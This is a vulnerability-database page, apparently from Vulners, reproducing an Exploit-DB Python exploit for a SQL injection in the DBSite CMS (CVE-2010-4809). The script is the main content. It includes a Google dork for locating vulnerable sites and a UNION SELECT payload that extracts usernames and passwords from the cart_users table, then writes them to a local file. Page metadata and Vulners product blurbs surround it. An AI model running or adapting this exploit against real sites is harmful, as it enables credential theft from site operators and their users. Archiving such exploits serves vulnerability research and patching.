Lucene search
+L

DBSite - SQL Injection

🗓️ 13 Nov 2010 00:00:00Reported by God_Of_PainType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

DBSite Remote SQL Injection Vulnerability. Exploit for CMS DBSite SQL Injection. Usage: Exploit.py <site> <id

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2010-4809
13 Nov 201000:00
circl
CVE
CVE-2010-4809
8 Jul 201122:00
cve
Cvelist
CVE-2010-4809
8 Jul 201122:00
cvelist
EUVD
EUVD-2010-4774
7 Oct 202500:30
euvd
NVD
CVE-2010-4809
8 Jul 201122:55
nvd
Prion
Sql injection
8 Jul 201122:55
prion
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# --------------------------------------------------------
# Exploit Title: DBSite Remote SQL Injection Vulnerability
# Date: 13/10/2010
# Author: God_Of_Pain
# Version: 1.0
# Tested on: Linux
# --------------------------------------------------------
# ========================================================
# Greetz to: LordTittiS3000 && System_Overide
# Example: http://www.site.it/index.php?id=[SQLi]
# Dork: intext:"Powered by DBSite" inurl:index.php?id=
# ========================================================

import urllib2
import sys
import re
import os
import time
import platform

if platform.system() == "Linux":
	os.system('clear')
elif platform.system() == "Windows":
	os.system('cls')

try:
	testo = """
	*****************************************************************
	*          +----------------------------------------+           *
	*          | CMS DBSite SQL Injection Vulnerability |           *
	*          +----------------------------------------+           *
	*          |     Bug Discovered  By God_Of_Pain     |           *
	*          +----------------------------------------+           *
	*          |      Exploit Coded By God_Of_Pain      |           *
	*          +----------------------------------------+           *
	* ============================================================  *
	* +----------------------------------------------------------+  *
	* |               Usage: Exploit.py <site> <id>              |  *
	* +----------------------------------------------------------+  *
	* |  python exploit.py <http://site.com/index.php?ID=> <10>  |  *
	* +----------------------------------------------------------+  *
	*****************************************************************

	"""
	print(testo)
	time.sleep(1)

	target = sys.argv[1]
	ID = sys.argv[2]
	http = "http://"
	sql = "+union+select+concat(0x3e3e3e,USERNAME,0x3a3a3a,PWD,0x3e3e3e),2,3+from+cart_users--"
	newid = "-"
	spa = " "

	if http in target:
		del(http)
	sqli = target + newid + ID + sql
	if spa in sqli:
		del(spa)
	print "Ok, Exploiting..."
	print ""
	time.sleep(1)
	print "Please Wait..."
	print ""
	time.sleep(1)
	try:
		prov = urllib2.urlopen(sqli).read()
		prov2 = re.findall(r">>>(.*)([0-9a-zA-Z])([^<>])(.*)>>>", prov)
		if len(prov2) > 1:
			print "+--------------+"
			print "| Exploit Done |"
			print "+--------------+"
			print "User & Pwd =>   " + prov2[0][0] + prov2[0][1]
			time.sleep(1)
			print ""
			print "Saving User && PWD in a .txt file..."
			print ""
			o = open("User&&PwdDBSiteExploit.txt", "w")
			o.write(prov2[0][0] + prov2[0][1])
			o.close()
			print "Saved!"
			print ""
			print "Thanks for using this Exploit!"
		else:
			print "+----------------------+"
			print "|    Exploit Failed    |"
			print "+----------------------+"
			print "|    I'm so sorry :(   |"
			print "+----------------------+"
	except urllib2.HTTPError:
		print "Sorry! Exploit Failed! There is an error :("
except IndexError:
	print "-* Good Luck! *-"

# The End! :)
# -------------------------------------
# http://oversecuritycrew.webnet32.com/
# -------------------------------------

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Nov 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.0099
30